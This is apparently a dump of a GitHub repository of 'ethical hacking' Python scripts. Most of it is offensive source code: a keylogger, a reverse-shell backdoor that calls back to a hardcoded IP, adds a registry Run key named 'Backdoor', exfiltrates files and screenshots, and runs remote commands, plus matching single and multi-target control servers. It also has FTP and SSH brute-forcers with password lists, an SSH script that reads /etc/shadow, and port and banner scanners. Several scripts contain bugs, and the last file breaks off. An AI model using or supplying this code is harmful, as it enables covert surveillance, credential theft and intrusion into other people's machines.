https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/ftpBrute_Screenshot.png -------------------------------------------------------------------------------- /README_Screenshots/ftpSniffer_Screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/ftpSniffer_Screenshot.png -------------------------------------------------------------------------------- /README_Screenshots/gmailBruteforce_Screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/gmailBruteforce_Screenshot.png -------------------------------------------------------------------------------- /README_Screenshots/hasher_Screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/hasher_Screenshot.png -------------------------------------------------------------------------------- /README_Screenshots/httpSniffer_Screenshot1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/httpSniffer_Screenshot1.png -------------------------------------------------------------------------------- /README_Screenshots/httpSniffer_Screenshot2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/httpSniffer_Screenshot2.png -------------------------------------------------------------------------------- /README_Screenshots/macChanger_Screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/macChanger_Screenshot.png -------------------------------------------------------------------------------- /README_Screenshots/macSniffer_Screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/macSniffer_Screenshot.png -------------------------------------------------------------------------------- /README_Screenshots/md5Brute_Screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/md5Brute_Screenshot.png -------------------------------------------------------------------------------- /README_Screenshots/packetAnalyzer_Screenshot1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/packetAnalyzer_Screenshot1.png -------------------------------------------------------------------------------- /README_Screenshots/packetAnalyzer_Screenshot2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/packetAnalyzer_Screenshot2.png -------------------------------------------------------------------------------- /README_Screenshots/portScan_Screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/portScan_Screenshot.png -------------------------------------------------------------------------------- /README_Screenshots/retrieveBanner_Screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/retrieveBanner_Screenshot.png -------------------------------------------------------------------------------- /README_Screenshots/reverseShell_Screenshot1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/reverseShell_Screenshot1.png -------------------------------------------------------------------------------- /README_Screenshots/reverseShell_Screenshot2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/reverseShell_Screenshot2.png -------------------------------------------------------------------------------- /README_Screenshots/reverseShell_Screenshot3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/reverseShell_Screenshot3.png -------------------------------------------------------------------------------- /README_Screenshots/reverseShell_Screenshot4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/reverseShell_Screenshot4.png -------------------------------------------------------------------------------- /README_Screenshots/reverseShell_Screenshot5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/reverseShell_Screenshot5.png -------------------------------------------------------------------------------- /README_Screenshots/reverseShell_Screenshot6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/reverseShell_Screenshot6.png -------------------------------------------------------------------------------- /README_Screenshots/reverseShell_Screenshot7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/reverseShell_Screenshot7.png -------------------------------------------------------------------------------- /README_Screenshots/reverseShell_Screenshot8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/reverseShell_Screenshot8.png -------------------------------------------------------------------------------- /README_Screenshots/reverseShell_Screenshot9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/reverseShell_Screenshot9.png -------------------------------------------------------------------------------- /README_Screenshots/sha1hash_Screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/sha1hash_Screenshot.png -------------------------------------------------------------------------------- /README_Screenshots/sshBrute_Screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/sshBrute_Screenshot.png -------------------------------------------------------------------------------- /README_Screenshots/sshLogin_Screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/sshLogin_Screenshot.png -------------------------------------------------------------------------------- /README_Screenshots/synFlooder_Screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/synFlooder_Screenshot.png -------------------------------------------------------------------------------- /README_Screenshots/threaded_Screenshot1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/threaded_Screenshot1.png -------------------------------------------------------------------------------- /README_Screenshots/threaded_Screenshot2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/threaded_Screenshot2.png -------------------------------------------------------------------------------- /README_Screenshots/vulnerabilityScanner_Screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/vulnerabilityScanner_Screenshot.png -------------------------------------------------------------------------------- /Reverse_Shell_Scripts/keylogger.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/20/2021 4 | 5 | from pynput import keyboard 6 | import threading 7 | import os 8 | 9 | log = "" 10 | path = os.environ["appdata"] + "\\processmanager.txt" 11 | 12 | def process_keys(key): 13 | global log 14 | try: 15 | log += str(key.char) 16 | except AttributeError: 17 | if key == key.space: 18 | log += " " 19 | elif key == key.right or key == key.left or key == key.left or key == key.right: 20 | log += '' 21 | else: 22 | log+= str(key) + " " 23 | 24 | print(log) 25 | 26 | def report(): 27 | global log 28 | global path 29 | fil = open(path, 'a') 30 | fil.write(log) 31 | log = "" 32 | fil.close() 33 | timer = threading.Timer(10, report) 34 | timer.start() 35 | 36 | 37 | def start(): 38 | keyboard_listener = keyboard.Listener(on_press=process_keys) 39 | with keyboard_listener: 40 | report() 41 | keyboard_listener.join() 42 | -------------------------------------------------------------------------------- /Reverse_Shell_Scripts/reverseShell.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/21/2021 - 1/24/2021 4 | 5 | import socket 6 | from termcolor import colored 7 | import subprocess 8 | import json 9 | import os 10 | import base64 11 | import shutil 12 | import time 13 | import requests 14 | import mss 15 | import threading 16 | import keylogger 17 | 18 | def reliable_send(data): 19 | jsonData = json.dumps(data) 20 | sock.send(jsonData.encode()) 21 | 22 | def reliable_recv(): 23 | data = b'' 24 | while True: 25 | try: 26 | data = data + sock.recv(1024) 27 | return json.loads(data) 28 | except ValueError: 29 | continue 30 | 31 | def is_admin(): 32 | global admin 33 | try: 34 | temp = os.listdir(os.sep.join([os.environ.get('SystemRoot', 'C:\windows'), 'temp'])) 35 | except: 36 | admin = '[-] User Privileges' 37 | else: 38 | admin = '[+] Admin Privileges' 39 | 40 | def screenshot(): 41 | with mss() as screenshot: 42 | screenshot.shot() 43 | 44 | def download(url): #Work in Progress 45 | getResponse = requests.get(url) 46 | fileName = url.split('/')[-1] 47 | with open(fileName, "wb") as outFile: 48 | outFile.write(getResponse.content) 49 | 50 | def connection(): 51 | while True: 52 | time.sleep(5) 53 | try: 54 | sock.connect(("192.168.7.125", 54321)) 55 | print(colored("[+] Connection Established!", "green")) 56 | shell() 57 | sock.close() 58 | break 59 | except: 60 | print(colored("[-] Unable to restablish connection. Re-trying...", "red")) 61 | connection() 62 | 63 | def shell(): 64 | while True: 65 | command = reliable_recv() 66 | if command == 'exit': 67 | continue 68 | 69 | elif command == "close": 70 | break 71 | 72 | elif command == "sendall": 73 | subprocess.Popen(command[8:], shell=True) 74 | 75 | elif command == "help": 76 | options = '''download path --> Download File from Target PC 77 | upload path --> Upload File to Target PC 78 | get url ---> Download File to Target PC From Any Website 79 | start path --> Start Program on Target PC 80 | screenshot --> Take Screenshot of Target's Monitor 81 | admin --> Check if User has Admin Privileges 82 | keylog start --> Start Keylogger 83 | keylog dump --> Dump Keystrokes from Keylogger 84 | exit --> Exit Reverse Shell''' 85 | reliable_send(options) 86 | 87 | elif command[:2] == "cd" and len(command) > 1: 88 | try: 89 | os.chdir(command[3:]) 90 | except: 91 | continue 92 | 93 | elif command[:8] == "download": 94 | with open(command[9:], "rb") as download: 95 | reliable_send(base64.b64encode(download.read())) 96 | 97 | elif command[:6] == "upload": #Work in Progress 98 | with open(command[7:], "wb") as upload: 99 | fileData = reliable_recv() 100 | upload.write(base64.b64decode(fileData)) 101 | 102 | elif command[:3] == "get": #Work in Progress 103 | try: 104 | download(command[4:]) 105 | reliable_send("[+] Downloaded File from Specified URL") 106 | except: 107 | reliable_send("[-] Failed to Download File") 108 | 109 | elif command[:10] == "screenshot": #Work in Progress 110 | try: 111 | screenshot() 112 | with open("monitor-1.png", "rb") as sc: 113 | reliable_send(base64.b64encode(sc.read())) 114 | os.remove("monitor-1.png") 115 | except: 116 | reliable_send("[-] Failed to take Screenshot") 117 | 118 | elif command[:5] == "admin": 119 | try: 120 | is_admin() 121 | reliable_send(admin) 122 | except: 123 | reliabel_send("[-] Can't Perform Admin Check") 124 | 125 | elif command[:5] == "start": 126 | try: 127 | subprocess.Popen(command[6:], shell=True) 128 | reliable_send("[+] Started Process") 129 | except: 130 | reliable_send("[-] Failed to Start Process") 131 | 132 | elif command[:12] == "keylog start": 133 | t1 = Threading.Thread(target=keylogger.start) 134 | t1.start() 135 | 136 | elif command[:11] == "keylog dump": 137 | fn = open(keylogger_path, "r") 138 | reliable_send(fn.read()) 139 | 140 | else: 141 | proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) 142 | result = proc.stdout.read() + proc.stderr.read() 143 | reliable_send(result) 144 | 145 | keylogger_path = os.environ["appdata"] + "\\processmanager.txt" 146 | 147 | location = os.environ["appdata"] + "\\windows32.exe" 148 | if not os.path.exists(location): 149 | shutil.copyfile(sys.executable,location) 150 | subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "' + location + '"', shell=True) 151 | 152 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 153 | connection() 154 | sock.close() 155 | -------------------------------------------------------------------------------- /Reverse_Shell_Scripts/server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/21/2021-01/24/2021 4 | 5 | import socket 6 | from termcolor import colored 7 | import json 8 | import os 9 | import base64 10 | 11 | count = 1 12 | 13 | def reliable_send(data): 14 | jsonData = json.dumps(data) 15 | target.send(jsonData.encode()) 16 | 17 | def reliable_recv(): 18 | data = b'' 19 | while True: 20 | try: 21 | data = data + target.recv(1024) 22 | return json.loads(data) 23 | except ValueError: 24 | continue 25 | 26 | def shell(): 27 | global count 28 | while True: 29 | command = input("Shell#~%s: " % str(ip)) 30 | reliable_send(command) 31 | if command == 'exit': 32 | break 33 | 34 | elif command[:2] == "cd" and len(command) > 1: 35 | continue 36 | 37 | elif command[:8] == "download": 38 | with open(command[9:], "wb") as download: 39 | fileData = reliable_recv() 40 | download.write(base64.b64decode(fileData)) 41 | 42 | elif command[:6] == "upload": #Work in Progress 43 | with open(command[7:], "rb") as upload: 44 | try: 45 | reliable_send(base64.b64encode(upload.read())) 46 | except: 47 | failed = '[-] Failed to Upload' 48 | print(colored(failed, "red")) 49 | reliable_send(base64.b64encode(failed)) 50 | 51 | elif command[:10] == "screenshot": #Work in Progress 52 | with open("screenshot%d" % count, "wb") as sc: 53 | image = reliable_recv() 54 | imageDecode = base64.b64decode(image) 55 | if imageDecode[:3] == "[-]": 56 | print(image) 57 | else: 58 | sc.write(image) 59 | count += 1 60 | 61 | elif command[:12] == "keylog start": 62 | continue 63 | 64 | else: 65 | result = reliable_recv() 66 | print(result) 67 | 68 | def server(): 69 | global sock 70 | global ip 71 | global target 72 | 73 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 74 | sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 75 | sock.bind(("192.168.7.125", 54321)) 76 | sock.listen(5) 77 | print(colored("[!] Listening For Incoming Connections", "yellow")) 78 | target, ip = sock.accept() 79 | print(colored("[+] Connection Established From : %s" % str(ip), "green")) 80 | 81 | server() 82 | shell() 83 | sock.close() 84 | -------------------------------------------------------------------------------- /Reverse_Shell_Scripts/threaded.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/24/2021 4 | 5 | import socket 6 | import json 7 | import os 8 | import base64 9 | import threading 10 | 11 | count = 0 12 | 13 | def sendToAll(target, data): 14 | jsonData = json.dumps(data) 15 | target.send(jsonData.encode()) 16 | 17 | def shell(target, ip): 18 | def reliable_send(data): 19 | jsonData = json.dumps(data) 20 | target.send(jsonData.encode()) 21 | 22 | def reliable_recv(): 23 | data = b'' 24 | while True: 25 | try: 26 | data = data + target.recv(1024) 27 | return json.loads(data) 28 | except ValueError: 29 | continue 30 | 31 | global count 32 | while True: 33 | command = input("Shell#~%s: " % str(ip)) 34 | reliable_send(command) 35 | if command == 'exit': 36 | break 37 | 38 | elif command == "close": 39 | target.close() 40 | targets.remove(target) 41 | ips.remove(ip) 42 | break 43 | 44 | elif command[:2] == "cd" and len(command) > 1: 45 | continue 46 | 47 | elif command[:8] == "download": 48 | with open(command[9:], "wb") as download: 49 | fileData = reliable_recv() 50 | download.write(base64.b64decode(fileData)) 51 | 52 | elif command[:6] == "upload": #Work in Progress 53 | with open(command[7:], "rb") as upload: 54 | try: 55 | reliable_send(base64.b64encode(upload.read())) 56 | except: 57 | failed = '[-] Failed to Upload' 58 | print(colored(failed, "red")) 59 | reliable_send(base64.b64encode(failed)) 60 | 61 | elif command[:10] == "screenshot": #Work in Progress 62 | with open("screenshot%d" % count, "wb") as sc: 63 | image = reliable_recv() 64 | imageDecode = base64.b64decode(image) 65 | if imageDecode[:3] == "[-]": 66 | print(image) 67 | else: 68 | sc.write(image) 69 | count += 1 70 | 71 | elif command[:12] == "keylog start": 72 | continue 73 | 74 | else: 75 | result = reliable_recv() 76 | print(result) 77 | 78 | def server(): 79 | global clients 80 | while True: 81 | if stopThreads: 82 | break 83 | sock.settimeout(1) 84 | try: 85 | target, ip = socket.accept() 86 | targets.append(target) 87 | ips.append(ip) 88 | print(str(targets[clients]) + " --- " str(ips[clients]) + "has connected") 89 | clients += 1 90 | except: 91 | pass 92 | 93 | global sock 94 | ips = [] 95 | targets = [] 96 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 97 | sock.setsockopt((socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)) 98 | sock.bind(("192.168.7.125", 54321)) 99 | sock.listen(5) 100 | 101 | clients = 0 102 | stopThreads = False 103 | 104 | print("[!] Waiting for Targets to Connect...") 105 | 106 | t1 = threading.Thread(target=server) 107 | t1.start() 108 | 109 | while True: 110 | command = input("Command to Send to Control Center: ") 111 | if command == "targets": 112 | count = 0 113 | for ip in ips: 114 | print("Session " + str(count) + ". <-->" + str(ip)) 115 | count+= 1 116 | 117 | elif command[:7] == "session": 118 | try: 119 | num = int(command[8:]) 120 | targNum = targets[num] 121 | targIP - ips[num] 122 | shell(targNum, targIP) 123 | except: 124 | print("[-] No Session Under That Number") 125 | elif command == "exit": 126 | for target in targets: 127 | target.close() 128 | sock.close() 129 | stopThread = True 130 | 131 | elif command[:7] == "sendall": 132 | lengthTargs = len(targets) 133 | i = 0 134 | try: 135 | while i < lengthTargs: 136 | targNum = targets[i] 137 | sendToAll(targNum, command) 138 | i += 1 139 | except: 140 | print('[-] Failed to Send Command to All Targets') 141 | else: 142 | print('[-] Command Not Found') 143 | 144 | -------------------------------------------------------------------------------- /SSH_FTP_Scripts/anonymousLogin.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/12/2021 4 | 5 | import ftplib 6 | 7 | def anonLogin(hostname): 8 | try: 9 | ftp = ftplib.FTP(hostname) 10 | ftp.login('anonymous', 'anonymous') 11 | print('[+] ' + hostname + ' FTP Anonymous Login Successfull') 12 | ftp.quit() 13 | return True 14 | except: 15 | print('[-] ' + hostname + ' FTP Anonymous Login Failed') 16 | return False 17 | 18 | host = input("Enter IP Address to Target: ") 19 | anonLogin(host) 20 | -------------------------------------------------------------------------------- /SSH_FTP_Scripts/ftpBrute.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/13/2021 4 | 5 | import ftplib 6 | 7 | def bruteLogin(hostname, passwordFile): 8 | try: 9 | file = open(passwordFile, 'r') 10 | except: 11 | print('[-] File Does Not Exist') 12 | 13 | print('[*] Attempting to Login to: ' + hostname + '\n') 14 | for line in file.readlines(): 15 | username = line.split(':')[0].strip('\n') 16 | password = line.split(':')[1].strip('\n') 17 | print('[*] Trying Credentials: ' + username + ' : ' + password) 18 | try: 19 | ftp = ftplib.FTP(hostname) 20 | login = ftp.login(username, password) 21 | print('[+] Login Successful With: ' + username + ' / ' + password) 22 | ftp.quit() 23 | return(username, password) 24 | except: 25 | pass 26 | print('[-] Password Not In List') 27 | 28 | host = input("[*] Enter Host to Target: ") 29 | passwordFile = input('[*] Enter User/Password File Path: ') 30 | bruteLogin(host, passwordFile) 31 | -------------------------------------------------------------------------------- /SSH_FTP_Scripts/ftp_passwords.txt: -------------------------------------------------------------------------------- 1 | admin:administrator 2 | administrator:password 3 | root:toor 4 | root:password 5 | msfadmin:msfadmin 6 | user:abc123 7 | admin:qwerty 8 | user:Password1 9 | -------------------------------------------------------------------------------- /SSH_FTP_Scripts/passwords.txt: -------------------------------------------------------------------------------- 1 | password 2 | abc123 3 | toor 4 | msfadmin 5 | administrator 6 | password 7 | helloworld 8 | -------------------------------------------------------------------------------- /SSH_FTP_Scripts/sshBrute.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/11/2021 4 | 5 | import pexpect 6 | from colorama import Fore 7 | 8 | PROMPT = ['# ', '>>> ', '> ', '\$ ', '$ '] 9 | 10 | def send_command(connection, command): 11 | connection.sendline(command) 12 | connection.expect(PROMPT) 13 | print(connection.before.decode()) 14 | 15 | def connect(user, host, password): 16 | ssh_newkey = 'Are you sure you want to continue connecting' 17 | connString = 'ssh ' + user + '@' + host 18 | spawn = pexpect.spawn(connString) 19 | ret = spawn.expect([pexpect.TIMEOUT, ssh_newkey, '[P|p]assword: ']) 20 | if ret == 0: 21 | print('[-] Error Connecting') 22 | return 23 | 24 | if ret == 1: 25 | spawn.sendline('Yes') 26 | ret = spawn.expcet([pexpect.TIMEOUT, '[P|p]assword: ']) 27 | if ret == 0: 28 | print('[-] Error Connecting') 29 | return 30 | spawn.sendline(password) 31 | spawn.expect(PROMPT, timeout=0.1) 32 | return spawn 33 | 34 | def main(): 35 | host = input("Enter IP address of Target to Bruteforce: ") 36 | user = input("Enter User Account to Bruteforce: ") 37 | file = open('passwords.txt', 'r') 38 | for password in file.readlines(): 39 | password = password.strip('\n') 40 | try: 41 | spawn = connect(user, host, password) 42 | print(Fore.GREEN + '[+] Password Found: ' + password) 43 | send_command(spawn, 'cat /etc/shadow') 44 | except: 45 | print(Fore.RED + '[-] Wrong Password: ' + password) 46 | 47 | main() 48 | -------------------------------------------------------------------------------- /SSH_FTP_Scripts/sshLogin.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/11/2021 4 | 5 | import pexpect 6 | 7 | PROMPT = ['# ', '>>> ', '> ', '\$ ', '$ '] 8 | 9 | def send_command(connection, command): 10 | connection.sendline(command) 11 | connection.expect(PROMPT) 12 | print(connection.before.decode()) 13 | 14 | def connect(user, host, password): 15 | ssh_newkey = 'Are you sure you want to continue connecting' 16 | connString = 'ssh ' + user + '@' + host 17 | spawn = pexpect.spawn(connString) 18 | ret = spawn.expect([pexpect.TIMEOUT, ssh_newkey, '[P|p]assword: ']) 19 | if ret == 0: 20 | print('[-] Error Connecting') 21 | return 22 | 23 | if ret == 1: 24 | spawn.sendline('Yes') 25 | ret = spawn.expcet([pexpect.TIMEOUT, '[P|p]assword: ']) 26 | if ret == 0: 27 | print('[-] Error Connecting') 28 | return 29 | spawn.sendline(password) 30 | spawn.expect(PROMPT) 31 | return spawn 32 | 33 | def main(): 34 | host = input("Enter Host to Target: ") 35 | user = input("Enter SSH Username: ") 36 | password = input("Enter SSH Password: ") 37 | shell = connect(user, host, password) 38 | send_command(shell, 'cat /etc/shadow | grep root;ps') 39 | 40 | main() 41 | -------------------------------------------------------------------------------- /Scanner_Scripts/advancedPortScanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Wrttien By: Sahar Hathiramani 3 | # Date: 01/07/2020 4 | 5 | from socket import * 6 | import optparse 7 | from threading import * 8 | 9 | def connectionScan(targetHost, targetPort): 10 | try: 11 | sock = socket(AF_INET, SOCK_STREAM) 12 | sock.connect((targetHost,targetPort)) 13 | print '[*] %d/tcp Open' % targetPort 14 | except: 15 | print '[-] %d/tcp Closed' % targetPort 16 | finally: 17 | sock.close() 18 | 19 | def portScan(targetHost, targetPorts): 20 | try: 21 | ip = gethostbyname(targetHost) 22 | except: 23 | print 'Unkown Host %s' %s (targetHost) 24 | 25 | try: 26 | targetName = gethostbyaddr(ip) 27 | print '[*] Scan Results For: ' + targetName; 28 | except: 29 | print '[*] Scan Results For: ' + ip 30 | 31 | setdefaulttimeout(1) 32 | 33 | for port in targetPorts: 34 | t = Thread(target=connectionScan, args=(targetHost, int(port))) 35 | t.start() 36 | 37 | 38 | def main(): 39 | parser = optparse.OptionParser('Usage: ' + 'Usage: ./advancerscanner.py -H -p ') 40 | parser.add_option('-H', dest='targetHost', type='string', help='Specify Target Host') 41 | parser.add_option('-p', dest='targetPorts', type='string', help='Specify Ports separated by commas') 42 | (options, args) = parser.parse_args() 43 | targetHost = options.targetHost 44 | targetPorts = str(options.targetPorts).split(',') 45 | 46 | if (targetHost == None) | (targetPorts[0] == None): 47 | print(parser.usage) 48 | exit(0) 49 | 50 | portScan(targetHost, targetPorts) 51 | 52 | if __name__ == '__main__': 53 | main() 54 | -------------------------------------------------------------------------------- /Scanner_Scripts/portScan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/07/2021 4 | 5 | import socket 6 | from termcolor import colored 7 | 8 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 9 | socket.setdefaulttimeout(2) 10 | 11 | host = input("[*] Please Specify a Host to Scan: ") 12 | 13 | def portscanner(port): 14 | if sock.connect_ex((host,port)): 15 | print(colored("[-] Port %d is closed" % (port), 'red')) 16 | else: 17 | print(colored("[+] Port %d is open" % (port), 'green')) 18 | 19 | for port in range (1, 1000): 20 | portscanner(port); 21 | -------------------------------------------------------------------------------- /Scanner_Scripts/retrieveBanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/07/2021 4 | 5 | import socket 6 | 7 | def returnBanner(ip, port): 8 | try: 9 | socket.setdefaulttimeout(2) 10 | s = socket.socket() 11 | s.connect((ip,port)) 12 | banner = s.recv(1024) 13 | return banner 14 | except: 15 | return 16 | 17 | def main(): 18 | ip = raw_input("[*] Enter Target IP to Scan: ") 19 | for port in range(1,100): 20 | banner = returnBanner(ip, port) 21 | if banner: 22 | print "[*]" + ip + ":" + str(port) + " - " + banner.strip('\n') 23 | 24 | main() 25 | 26 | 27 | -------------------------------------------------------------------------------- /Scanner_Scripts/vulnerabilities.txt: -------------------------------------------------------------------------------- 1 | randomVulnerability1 2 | SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1 3 | randomVulnerability2 4 | 220 metasploitable.localdomain ESMTP Postfix (Ubuntu) 5 | randomVulnerability3 6 | randomVulnerability4 7 | randomVulnerability5 8 | 9 | 10 | -------------------------------------------------------------------------------- /Scanner_Scripts/vulnerabilityScanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/11/2021 4 | 5 | import socket 6 | import os 7 | import sys 8 | 9 | def retrieveBanner(ip, port): 10 | try: 11 | socket.setdefaulttimeout(2) 12 | sock = socket.socket() 13 | sock.connect((ip,port)) 14 | banner = sock.recv(1024) 15 | return str(banner) 16 | except: 17 | return 18 | 19 | def checkVulnerabilities(banner, filename): 20 | file = open(filename, "r") 21 | for line in file.readlines(): 22 | if line.strip("\n") in banner: 23 | print '[+] Server has vulnerability: ' + banner.strip("\n") 24 | return 25 | 26 | def main(): 27 | if len(sys.argv) == 2: 28 | filename = sys.argv[1] 29 | if not os.path.isfile(filename): 30 | print '[-] File Does Not Exist' 31 | exit(0) 32 | if not os.access(filename, os.R_OK): 33 | print '[-] Access Denied' 34 | exit(0) 35 | else: 36 | print '[-] Usage: ' + str(sys.argv[0]) + " " 37 | exit(0) 38 | 39 | portlist = [20, 21, 22, 25, 443, 3389] #Ports to Test 40 | for x in range(4,7): #SPECIFY RANGE OF IPs TO TEST 41 | ip = "192.168.7.10" + str(x) 42 | print '------ Scanning ' + ip + ' ------' 43 | for port in portlist: 44 | banner = retrieveBanner(ip,port) 45 | if banner: 46 | checkVulnerabilities(banner, filename) 47 | main() 48 | -------------------------------------------------------------------------------- /Web_Pen_Testing_Scripts/baseDigestAuth.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/24/2021 4 | 5 | import requests 6 | from threading import Thread 7 | import sys 8 | import time 9 | import getopt 10 | from requests.auth import HTTPDigestAuth 11 | 12 | global hit 13 | hit = "1" 14 | 15 | def banner(): 16 | print(''' -------------------- 17 | BASE OR DIGEST AUTH 18 | --------------------''') 19 | def usage(): 20 | print("Usage: -w -u -t -f -m ") 21 | print("Example: python3 baseDigestAuth.py -w http://randomsite.com -u admin -t 5 -f passwords.txt -m basic\n") 22 | 23 | 24 | class request_performer(Thread): 25 | def __init__(self, passwd, user, url, method): 26 | Thread.__init__(self) 27 | self.password = passwd.split("\n")[0] 28 | self.username = user 29 | self.url = url 30 | self.method = method 31 | print("-" + self.password + "-") 32 | 33 | def run(self): 34 | global hit 35 | 36 | if hit == "1": 37 | try: 38 | if self.method == "basic": 39 | r = requests.get(self.url, auth=(self.user, self.password)) 40 | elif self.method == "digest": 41 | r 